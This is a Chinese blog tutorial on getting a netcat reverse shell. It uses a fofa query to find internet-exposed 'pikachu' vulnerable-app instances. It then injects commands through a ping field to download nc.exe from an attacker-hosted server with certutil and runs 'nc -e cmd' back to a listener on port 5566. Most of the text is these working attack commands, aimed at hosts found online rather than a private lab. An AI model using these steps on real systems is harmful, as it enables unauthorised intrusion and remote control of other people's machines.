X黑手网
X黑手网
X黑手网

保姆级教程来袭!轻松掌握NC反弹shell实战技巧🔥

环境工具

攻击机:CentOS7

目标机器:Windows

nc是netcat的简写,有着网络界的瑞士军刀美誉

步骤

1. 寻找在线靶场目标(切记,不要瞎整哈,容易包吃住)

fofa搜索:”pikachu” && country=”CN” && title==”Get the pikachu”

image

2. 下载nc,下载地址https://github.com/int0x33/nc.exe

3. 使用宝塔面板快速创建网站,自己有网站的可忽略此步骤。

image

4. 将nc上传到网站上面,上传后直接访问路径即可下载文件,比如:http://ip:端口/nc.exe

image

5. 在线靶场输入命令,将nc上传到靶场环境

127.0.0.1 & certutil -urlcache -split -f http://自己搭建网站的IP或域名/nc.exe testnc.exe

image

6. 上传后继续在靶场执行如下命令,查看nc是否上传成功

127.0.0.1 & dir

image

7. 控制端做反向连接,首先在控制端启动监听在攻击机上执行如下命令监听的5566端口,注意:攻击机的5566端口需要开放,如果是用宝塔面板也需要在宝塔面板开放端口。

nc -lv 5566

image

8. 目标机器做正向连接至控制端把受害主机的cmd终端发送至攻击者主机ip的5566端口,这种连接方式使得控制端能够接收来自受控端的连接,即使受控端的网络环境限制了其主动发起连接的能力.。在靶场执行如下命令:

127.0.0.1 & testnc.exe -e cmd 攻击机ip 5566

. 到这里使用nc的反弹shell就成功了,如下图

image

 

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容